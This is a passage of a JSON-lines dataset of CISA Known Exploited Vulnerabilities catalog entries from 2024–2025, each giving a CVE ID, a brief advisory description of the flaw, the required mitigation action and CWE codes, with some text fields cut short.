"text": "Microsoft Windows DWM Core Library Use-After-Free Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows DWM Core Library contains a use-after-free vulnerability that allows an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-30400", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-47729", "text": "TeleMessage TM SGNL Hidden Functionality Vulnerability\n\nAffected: TeleMessage TM SGNL\n\nTeleMessage TM SGNL contains a hidden functionality vulnerability in which the archiving backend holds cleartext copies of messages from TM SGNL application users.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-912\n\n[Source: CISA Known Exploited Vulnerabilities C", "cve_id": "CVE-2025-47729", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-11120", "text": "GeoVision Devices OS Command Injection Vulnerability\n\nAffected: GeoVision Multiple Devices\n\nMultiple GeoVision devices contain an OS command injection vulnerability that allows a remote, unauthenticated attacker to inject and execute arbitrary system commands. The impacted products could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud service", "cve_id": "CVE-2024-11120", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-27363", "text": "FreeType Out-of-Bounds Write Vulnerability\n\nAffected: FreeType FreeType\n\nFreeType contains an out-of-bounds write vulnerability when attempting to parse font subglyph structures related to TrueType GX and variable font files that may allow for arbitrary code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploite", "cve_id": "CVE-2025-27363", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-3248", "text": "Langflow Missing Authentication Vulnerability\n\nAffected: Langflow Langflow\n\nLangflow contains a missing authentication vulnerability in the /api/v1/validate/code endpoint that allows a remote, unauthenticated attacker to execute arbitrary code via crafted HTTP requests.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-306\n\n[Source: CISA Known Exploit", "cve_id": "CVE-2025-3248", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-34028", "text": "Commvault Command Center Path Traversal Vulnerability\n\nAffected: Commvault Command Center\n\nCommvault Command Center contains a path traversal vulnerability that allows a remote, unauthenticated attacker to execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-34028", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-58136", "text": "Yiiframework Yii Improper Protection of Alternate Path Vulnerability\n\nAffected: Yiiframework Yii\n\nYii Framework contains an improper protection of alternate path vulnerability that may allow a remote attacker to execute arbitrary code. This vulnerability could affect other products that implement Yii, including—but not limited to—Craft CMS, as represented by CVE-2025-32432.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or di", "cve_id": "CVE-2024-58136", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-38475", "text": "Apache HTTP Server Improper Escaping of Output Vulnerability\n\nAffected: Apache HTTP Server\n\nApache HTTP Server contains an improper escaping of output vulnerability in mod_rewrite that allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for ", "cve_id": "CVE-2024-38475", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-31324", "text": "SAP NetWeaver Unrestricted File Upload Vulnerability\n\nAffected: SAP NetWeaver\n\nSAP NetWeaver Visual Composer Metadata Uploader contains an unrestricted file upload vulnerability that allows an unauthenticated agent to upload potentially malicious executable binaries.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-434\n\n[Source: CI", "cve_id": "CVE-2025-31324", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-1976", "text": "Broadcom Brocade Fabric OS Code Injection Vulnerability\n\nAffected: Broadcom Brocade Fabric OS\n\nBroadcom Brocade Fabric OS contains a code injection vulnerability that allows a local user with administrative privileges to execute arbitrary code with full root privileges.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploite", "cve_id": "CVE-2025-1976", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-42599", "text": "Qualitia Active! Mail Stack-Based Buffer Overflow Vulnerability\n\nAffected: Qualitia Active! Mail\n\nQualitia Active! Mail contains a stack-based buffer overflow vulnerability that allows a remote, unauthenticated attacker to execute arbitrary or trigger a denial-of-service via a specially crafted request.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CW", "cve_id": "CVE-2025-42599", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-3928", "text": "Commvault Web Server Unspecified Vulnerability\n\nAffected: Commvault Web Server\n\nCommvault Web Server contains an unspecified vulnerability that allows a remote, authenticated attacker to create and execute webshells.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-3928", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24054", "text": "Microsoft Windows NTLM Hash Disclosure Spoofing Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows NTLM contains an external control of file name or path vulnerability that allows an unauthorized attacker to perform spoofing over a network.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-73\n\n[Source: CISA Known Exploited Vulnerabilities C", "cve_id": "CVE-2025-24054", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-31201", "text": "Apple Multiple Products Arbitrary Read and Write Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and other Apple products contain an arbitrary read and write vulnerability that allows an attacker to bypass Pointer Authentication.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-31201", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-31200", "text": "Apple Multiple Products Memory Corruption Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and other Apple products contain a memory corruption vulnerability that allows for code execution when processing an audio stream in a maliciously crafted media file.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\n[Source: CISA Known Exploited ", "cve_id": "CVE-2025-31200", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-53150", "text": "Linux Kernel Out-of-Bounds Read Vulnerability\n\nAffected: Linux Kernel\n\nLinux Kernel contains an out-of-bounds read vulnerability in the USB-audio driver that allows a local, privileged attacker to obtain potentially sensitive information.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-125\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-53150", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-53197", "text": "Linux Kernel Out-of-Bounds Access Vulnerability\n\nAffected: Linux Kernel\n\nLinux Kernel contains an out-of-bounds access vulnerability in the USB-audio driver that allows an attacker with physical access to the system to use a malicious USB device to potentially manipulate system memory, escalate privileges, or execute arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigation", "cve_id": "CVE-2024-53197", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-29824", "text": "Microsoft Windows Common Log File System (CLFS) Driver Use-After-Free Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Common Log File System (CLFS) Driver contains a use-after-free vulnerability that allows an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-416\n\n[Sou", "cve_id": "CVE-2025-29824", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-30406", "text": "Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability\n\nAffected: Gladinet CentreStack\n\nGladinet CentreStack and Triofox contains a use of hard-coded cryptographic key vulnerability in the way that the application manages keys used for ViewState integrity verification. Successful exploitation allows an attacker to forge ViewState payloads for server-side deserialization, allowing for remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, f", "cve_id": "CVE-2025-30406", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-31161", "text": "CrushFTP Authentication Bypass Vulnerability\n\nAffected: CrushFTP CrushFTP\n\nCrushFTP contains an authentication bypass vulnerability in the HTTP authorization header that allows a remote unauthenticated attacker to authenticate to any known or guessable user account (e.g., crushadmin), potentially leading to a full compromise. \n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are ", "cve_id": "CVE-2025-31161", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-22457", "text": "Ivanti Connect Secure, Policy Secure, and ZTA Gateways Stack-Based Buffer Overflow Vulnerability\n\nAffected: Ivanti Connect Secure, Policy Secure, and ZTA Gateways\n\nIvanti Connect Secure, Policy Secure, and ZTA Gateways contains a stack-based buffer overflow vulnerability that allows a remote unauthenticated attacker to achieve remote code execution. \n\nRequired Action: Apply mitigations as set forth in the CISA instructions linked below.\n\nRansomware: Known\n\nCWE(s): CWE-121\n\n[Source: CISA Known Ex", "cve_id": "CVE-2025-22457", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24813", "text": "Apache Tomcat Path Equivalence Vulnerability\n\nAffected: Apache Tomcat\n\nApache Tomcat contains a path equivalence vulnerability that allows a remote attacker to execute code, disclose information, or inject malicious content via a partial PUT request.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-44, CWE-502\n\n[Source: CISA Known Exploited Vulnerabi", "cve_id": "CVE-2025-24813", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-20439", "text": "Cisco Smart Licensing Utility Static Credential Vulnerability\n\nAffected: Cisco Smart Licensing Utility\n\nCisco Smart Licensing Utility contains a static credential vulnerability that allows an unauthenticated, remote attacker to log in to an affected system and gain administrative credentials.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-912\n\n[Sou", "cve_id": "CVE-2024-20439", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-2783", "text": "Google Chromium Mojo Sandbox Escape Vulnerability\n\nAffected: Google Chromium Mojo\n\nGoogle Chromium Mojo on Windows contains a sandbox escape vulnerability caused by a logic error, which results from an incorrect handle being provided in unspecified circumstances. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-", "cve_id": "CVE-2025-2783", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-30154", "text": "reviewdog/action-setup GitHub Action Embedded Malicious Code Vulnerability\n\nAffected: reviewdog action-setup GitHub Action\n\nreviewdog action-setup GitHub Action contains an embedded malicious code vulnerability that dumps exposed secrets to Github Actions Workflow Logs.\n\nRequired Action: Apply mitigations as set forth in the CISA instructions linked below. Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if miti", "cve_id": "CVE-2025-30154", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-48248", "text": "NAKIVO Backup and Replication Absolute Path Traversal Vulnerability\n\nAffected: NAKIVO Backup and Replication\n\nNAKIVO Backup and Replication contains an absolute path traversal vulnerability that enables an attacker to read arbitrary files.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-36\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-48248", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-1316", "text": "Edimax IC-7100 IP Camera OS Command Injection Vulnerability\n\nAffected: Edimax IC-7100 IP Camera\n\nEdimax IC-7100 IP camera contains an OS command injection vulnerability due to improper input sanitization that allows an attacker to achieve remote code execution via specially crafted requests. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 2", "cve_id": "CVE-2025-1316", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-30066", "text": "tj-actions/changed-files GitHub Action Embedded Malicious Code Vulnerability\n\nAffected: tj-actions changed-files GitHub Action\n\ntj-actions/changed-files GitHub Action contains an embedded malicious code vulnerability that allows a remote attacker to discover secrets by reading Github Actions Workflow Logs. These secrets may include, but are not limited to, valid AWS access keys, GitHub personal access tokens (PATs), npm tokens, and private RSA keys.\n\nRequired Action: Apply mitigations as set for", "cve_id": "CVE-2025-30066", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24472", "text": "Fortinet FortiOS and FortiProxy Authentication Bypass Vulnerability\n\nAffected: Fortinet FortiOS and FortiProxy\n\n Fortinet FortiOS and FortiProxy contain an authentication bypass vulnerability that allows a remote attacker to gain super-admin privileges via crafted CSF proxy requests.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE", "cve_id": "CVE-2025-24472", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-21590", "text": "Juniper Junos OS Improper Isolation or Compartmentalization Vulnerability\n\nAffected: Juniper Junos OS\n\nJuniper Junos OS contains an improper isolation or compartmentalization vulnerability. This vulnerability could allows a local attacker with high privileges to inject arbitrary code.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-653\n\n[Source: CIS", "cve_id": "CVE-2025-21590", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24201", "text": "Apple Multiple Products WebKit Out-of-Bounds Write Vulnerability\n\nAffected: Apple Multiple Products\n\nApple iOS, iPadOS, macOS, and other Apple products contain an out-of-bounds write vulnerability in WebKit that may allow maliciously crafted web content to break out of Web Content sandbox. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply mitigations per ", "cve_id": "CVE-2025-24201", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24993", "text": "Microsoft Windows NTFS Heap-Based Buffer Overflow Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows New Technology File System (NTFS) contains a heap-based buffer overflow vulnerability that allows an unauthorized attacker to execute code locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-122\n\n[Source: CISA Known Exploited Vulnerab", "cve_id": "CVE-2025-24993", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24991", "text": "Microsoft Windows NTFS Out-Of-Bounds Read Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows New Technology File System (NTFS) contains an out-of-bounds read vulnerability that allows an authorized attacker to disclose information locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-125\n\n[Source: CISA Known Exploited Vulnerabilities C", "cve_id": "CVE-2025-24991", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24985", "text": "Microsoft Windows Fast FAT File System Driver Integer Overflow Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Fast FAT File System Driver contains an integer overflow or wraparound vulnerability that allows an unauthorized attacker to execute code locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-190, CWE-122\n\n[Source: CISA Kno", "cve_id": "CVE-2025-24985", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24984", "text": "Microsoft Windows NTFS Information Disclosure Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows New Technology File System (NTFS) contains an insertion of sensitive Information into log file vulnerability that allows an unauthorized attacker to disclose information with a physical attack. An attacker who successfully exploited this vulnerability could potentially read portions of heap memory.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 gui", "cve_id": "CVE-2025-24984", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24983", "text": "Microsoft Windows Win32k Use-After-Free Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Win32 Kernel Subsystem contains a use-after-free vulnerability that allows an authorized attacker to elevate privileges locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-24983", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-26633", "text": "Microsoft Windows Management Console (MMC) Improper Neutralization Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Management Console (MMC) contains an improper neutralization vulnerability that allows an unauthorized attacker to bypass a security feature locally.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-707\n\n", "cve_id": "CVE-2025-26633", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-13161", "text": "Ivanti Endpoint Manager (EPM) Absolute Path Traversal Vulnerability\n\nAffected: Ivanti Endpoint Manager (EPM)\n\nIvanti Endpoint Manager (EPM) contains an absolute path traversal vulnerability that allows a remote unauthenticated attacker to leak sensitive information.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-36\n\n[Source: CISA Known Exploited Vu", "cve_id": "CVE-2024-13161", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-57968", "text": "Advantive VeraCore Unrestricted File Upload Vulnerability\n\nAffected: Advantive VeraCore\n\nAdvantive VeraCore contains an unrestricted file upload vulnerability that allows a remote unauthenticated attacker to upload files to unintended folders via upload.apsx.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-434\n\n[Source: CISA Known Exploited Vulnerab", "cve_id": "CVE-2024-57968", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-25181", "text": " Advantive VeraCore SQL Injection Vulnerability\n\nAffected: Advantive VeraCore\n\nAdvantive VeraCore contains a SQL injection vulnerability in timeoutWarning.asp that allows a remote attacker to execute arbitrary SQL commands via the PmSess1 parameter.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-89\n\n[Source: CISA Known Exploited Vulnerabilities Cat", "cve_id": "CVE-2025-25181", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-22226", "text": "VMware ESXi, Workstation, and Fusion Information Disclosure Vulnerability\n\nAffected: VMware ESXi, Workstation, and Fusion\n\nVMware ESXi, Workstation, and Fusion contain an information disclosure vulnerability due to an out-of-bounds read in HGFS. Successful exploitation allows an attacker with administrative privileges to a virtual machine to leak memory from the vmx process.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or d", "cve_id": "CVE-2025-22226", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-22225", "text": "VMware ESXi Arbitrary Write Vulnerability\n\nAffected: VMware ESXi\n\nVMware ESXi contains an arbitrary write vulnerability. Successful exploitation allows an attacker with privileges within the VMX process to trigger an arbitrary kernel write leading to an escape of the sandbox.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-123\n\n[S", "cve_id": "CVE-2025-22225", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-22224", "text": "VMware ESXi and Workstation TOCTOU Race Condition Vulnerability\n\nAffected: VMware ESXi and Workstation\n\nVMware ESXi and Workstation contain a time-of-check time-of-use (TOCTOU) race condition vulnerability that leads to an out-of-bounds write. Successful exploitation enables an attacker with local administrative privileges on a virtual machine to execute code as the virtual machine's VMX process running on the host.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable B", "cve_id": "CVE-2025-22224", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-50302", "text": "Linux Kernel Use of Uninitialized Resource Vulnerability\n\nAffected: Linux Kernel\n\nThe Linux kernel contains a use of uninitialized resource vulnerability that allows an attacker to leak kernel memory via a specially crafted HID report.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-908\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-50302", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-4885", "text": "Progress WhatsUp Gold Path Traversal Vulnerability\n\nAffected: Progress WhatsUp Gold\n\nProgress WhatsUp Gold contains a path traversal vulnerability that allows an unauthenticated attacker to achieve remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-4885", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-49035", "text": "Microsoft Partner Center Improper Access Control Vulnerability\n\nAffected: Microsoft Partner Center\n\nMicrosoft Partner Center contains an improper access control vulnerability that allows an attacker to escalate privileges.\n\nRequired Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-269\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-49035", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-20953", "text": "Oracle Agile Product Lifecycle Management (PLM) Deserialization Vulnerability\n\nAffected: Oracle Agile Product Lifecycle Management (PLM)\n\nOracle Agile Product Lifecycle Management (PLM) contains a deserialization vulnerability that allows a low-privileged attacker with network access via HTTP to compromise the system.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-502\n\n[Source: CISA Known Exploited Vulner", "cve_id": "CVE-2024-20953", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24989", "text": "Microsoft Power Pages Improper Access Control Vulnerability\n\nAffected: Microsoft Power Pages\n\nMicrosoft Power Pages contains an improper access control vulnerability that allows an unauthorized attacker to elevate privileges over a network potentially bypassing the user registration control.\n\nRequired Action: Apply mitigations per vendor instructions, follow BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-284\n\n[Source: CISA Kn", "cve_id": "CVE-2025-24989", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-0111", "text": "Palo Alto Networks PAN-OS File Read Vulnerability\n\nAffected: Palo Alto Networks PAN-OS\n\nPalo Alto Networks PAN-OS contains an external control of file name or path vulnerability. Successful exploitation enables an authenticated attacker with network access to the management web interface to read files on the PAN-OS filesystem that are readable by the “nobody” user.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s", "cve_id": "CVE-2025-0111", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-23209", "text": "Craft CMS Code Injection Vulnerability\n\nAffected: Craft CMS Craft CMS\n\nCraft CMS contains a code injection vulnerability caused by improper validation of the database backup path, ultimately enabling remote code execution.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-23209", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-0108", "text": "Palo Alto Networks PAN-OS Authentication Bypass Vulnerability\n\nAffected: Palo Alto Networks PAN-OS\n\nPalo Alto Networks PAN-OS contains an authentication bypass vulnerability in its management web interface. This vulnerability allows an unauthenticated attacker with network access to the management web interface to bypass the authentication normally required and invoke certain PHP scripts.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations", "cve_id": "CVE-2025-0108", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-53704", "text": "SonicWall SonicOS SSLVPN Improper Authentication Vulnerability\n\nAffected: SonicWall SonicOS\n\nSonicWall SonicOS contains an improper authentication vulnerability in the SSLVPN authentication mechanism that allows a remote attacker to bypass authentication.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: Known\n\nCWE(s): CWE-287\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2024-53704", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-57727", "text": "SimpleHelp Path Traversal Vulnerability\n\nAffected: SimpleHelp SimpleHelp\n\nSimpleHelp remote support software contains multiple path traversal vulnerabilities that allow unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files may include server configuration files and hashed user passwords.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nRansomware: ", "cve_id": "CVE-2024-57727", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-24200", "text": "Apple iOS and iPadOS Incorrect Authorization Vulnerability\n\nAffected: Apple iOS and iPadOS\n\nApple iOS and iPadOS contains an incorrect authorization vulnerability that allows a physical attacker to disable USB Restricted Mode on a locked device.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-863\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2025-24200", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-41710", "text": "Mitel SIP Phones Argument Injection Vulnerability\n\nAffected: Mitel SIP Phones\n\nMitel 6800 Series, 6900 Series, and 6900w Series SIP Phones, including the 6970 Conference Unit, contain an argument injection vulnerability due to insufficient parameter sanitization during the boot process. Successful exploitation may allow an attacker to execute arbitrary commands within the context of the system.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitig", "cve_id": "CVE-2024-41710", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-40891", "text": "Zyxel DSL CPE OS Command Injection Vulnerability\n\nAffected: Zyxel DSL CPE Devices\n\nMultiple Zyxel DSL CPE devices contain a post-authentication command injection vulnerability in the management commands that could allow an authenticated attacker to execute OS commands via Telnet.\n\nRequired Action: The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization if a current mitigation is unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Ex", "cve_id": "CVE-2024-40891", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2024-40890", "text": "Zyxel DSL CPE OS Command Injection Vulnerability\n\nAffected: Zyxel DSL CPE Devices\n\nMultiple Zyxel DSL CPE devices contain a post-authentication command injection vulnerability in the CGI program that could allow an authenticated attacker to execute OS commands via a crafted HTTP request.\n\nRequired Action: The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization if a current mitigation is unavailable.\n\nCWE(s): CWE-78\n\n[Source: CISA ", "cve_id": "CVE-2024-40890", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-21418", "text": "Microsoft Windows Ancillary Function Driver for WinSock Heap-Based Buffer Overflow Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Ancillary Function Driver for WinSock contains a heap-based buffer overflow vulnerability that allows for privilege escalation, enabling a local attacker to gain SYSTEM privileges.\n\nRequired Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.\n\nCWE(s): CWE-122\n\n[Source: CISA Known Exploited ", "cve_id": "CVE-2025-21418", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2025-21391", "text": "Microsoft Windows Storage Link Following 